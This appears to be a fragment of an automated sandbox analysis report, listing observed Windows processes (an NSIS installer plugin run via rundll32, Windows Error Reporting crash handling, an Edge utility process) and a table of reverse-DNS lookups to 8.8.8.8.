rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4656 -ip 4656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 624
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3704 --field-trial-handle=2252,i,16022092570067181109,3235558581947505669,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.53.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.16.208.104.in-addr.arpa | udp |